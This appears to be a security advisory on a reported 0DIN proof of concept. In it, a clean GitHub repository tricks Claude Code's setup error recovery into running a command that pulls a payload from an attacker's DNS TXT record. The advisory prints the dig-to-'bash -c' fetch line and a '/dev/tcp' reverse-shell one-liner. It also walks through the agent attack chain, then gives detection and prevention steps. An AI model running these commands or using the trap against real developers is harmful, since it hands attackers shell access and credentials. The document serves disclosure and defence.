Mozilla 0DIN DNS Setup Trap — clean GitHub repos trick Claude Code into reverse shell via DNS-TXT record command injection (no CVE; no patch as of 2026-06-28)
TL;DR
Mozilla's Zero Day Investigative Network (0DIN) demonstrated that a clean GitHub repository containing no malicious code can trick Claude Code into executing an attacker-controlled reverse shell via three indirection layers: a Python package that intentionally fails init → Claude Code's error-recovery automation runs the suggested fix command → the fix command resolves its payload from an attacker-controlled DNS TXT record. No exploit code ever appears in the repository.
What happened
On 2026-06-25, security researchers Andre Hall and Miller Engelbrecht at Mozilla's 0Din AI security platform published a proof-of-concept demonstrating a novel indirect prompt-injection attack against AI coding agents.
Attack chain:
-
Clean repository. The attacker publishes a GitHub repository containing a Python package with standard-looking setup instructions:
pip3 install -r requirements.txt && python3 -m axiom init. The repository passes static analysis, code review, and AI-assisted security scans — there is no malicious code in any file. -
Intentional failure. The Python package is designed to raise an error on initialization unless the
axiom initsubcommand is run first. When Claude Code is tasked with setting up the repository, it encounters this error during dependency installation. -
Error recovery automation. Claude Code's autonomous error-recovery mode treats this as a normal setup prerequisite and automatically executes the suggested command:
python3 -m axiom init. -
DNS-based command injection. The
axiompackage's init routine executes:bash cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"') bash -c "$cfg"The attacker controls the DNS TXT record at_axiom-config.m100.cloud. The resolved value decodes to:bash bash -i >& /dev/tcp/<attacker-host>/4443 0>&1 -
Reverse shell. Claude Code has now established an interactive reverse shell to the attacker's server with the developer's full privileges — including access to environment variables, API keys,
~/.claude/,~/.aws/, SSH agent sockets, and local credential files.
Why it bypasses defenses:
- No malicious code exists in the repository at clone time — static analysis,
git blame, diff review, and AI-assisted audit tools all return clean. - The actual payload (the DNS TXT record) is stored outside the repository and can be changed at any time after publication.
- The attacker never asks Claude Code to open a shell. Claude Code decides to run the command itself during error recovery. As 0DIN notes: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated."
- This is distinct from TrustFall (which exploits
.mcp.jsonMCP server auto-launch before any AI reasoning) — the DNS Setup Trap requires no special config file and exploits the agent's helpful error-recovery behavior during setup.
No CVE assigned. No patch from Anthropic as of 2026-06-28. Anthropic was not reported to have been contacted during the 0DIN disclosure (the article does not mention a disclosure to the vendor before publication).
Am I affected?
You may be affected if:
- You used Claude Code (with auto-execute or trust-this-folder enabled) to clone and set up an untrusted GitHub repository.
- Claude Code ran
python3 -m <package> init,npm run setup, or similar init commands that you did not explicitly type yourself. - You noticed an unexpected outbound connection to an unknown host on port 4443.
# Check for unexpected outbound connections from recent sessions
# (after the fact — if you're still running, check now)
ss -tnp | grep 4443
# Check Claude Code's session log for auto-executed setup commands
ls ~/.claude/projects/
# Check for the specific axiom package in any virtual environment
pip show axiom 2>/dev/null && echo "axiom package found — investigate"
# Check for the specific m100.cloud IOC in DNS query history
# (most systems don't log this by default — check your router/firewall)
IOC: DNS lookup for _axiom-config.m100.cloud → indicates the trap was triggered (whether or not the reverse shell connected).
If you are affected
- Assume full compromise of the developer's environment — the reverse shell grants the attacker the same access as the developer's terminal session.
- Follow Rotating Cloud Credentials — rotate all credentials visible from the environment: AWS keys, Anthropic/OpenAI API keys, GitHub tokens, SSH keys, cloud service credentials.
- Follow If Your Local AI Agent Was Exploited — inspect Claude Code's session logs and
~/.claude/for persistence mechanisms. - If the session had MCP servers configured, treat all downstream service credentials as compromised.
- Review
~/.claude/settings.jsonforhooks.sessionStartentries or unexpected MCP server entries added during the session.
Prevention
This attack exploits Claude Code's error-recovery behavior when it has permission to run terminal commands. Mitigations:
- Audit
setup.py/ init subcommands before letting Claude Code run them. If the setup instruction involvespython3 -m <package> <subcommand>, run it manually in an isolated environment first and inspect its network activity (strace -e trace=network python3 -m axiom initor similar). - Use
--sandboxmode (or equivalent isolation) when exploring untrusted repositories with Claude Code. Sandbox mode prevents outbound network connections from sub-processes. - Inspect DNS query history for unexpected TXT record lookups during setup. Tools:
dnsmasqlogging, Pi-hole query log,sudo tcpdump -i any -n udp port 53. - Block outbound connections from terminal sub-processes that are not to known package registries (npm, PyPI, GitHub) during repository setup.
- Never let Claude Code auto-execute setup commands in a repository you haven't reviewed. The "trust this folder" prompt should be accompanied by a manual review of all
package.jsonscripts,setup.pysubcommands, and Makefile targets. - See npm Hardening and Supply Chain Attack Surface for general dependency hygiene.
Sources
- 0DIN — "Clone This Repo and I Own Your Machine" — primary research; Andre Hall & Miller Engelbrecht; full attack chain; DNS TXT mechanism; reverse shell payload; PoC repository details. Published 2026-06-25.
- BleepingComputer — "Clean GitHub repo tricks AI coding agents into running malware" — secondary coverage; Bill Toulas; attack flow narration; "three indirection steps" quote. Published 2026-06-27.
- Cross-reference: TrustFall (2026-05) — sibling class (MCP auto-execute on folder trust); same root: AI agent automation exploited via repo-embedded config without user consent.
- Cross-reference: Agentjacking / Sentry MCP injection (2026-06) — sibling class (indirect prompt injection via data sources the agent reads).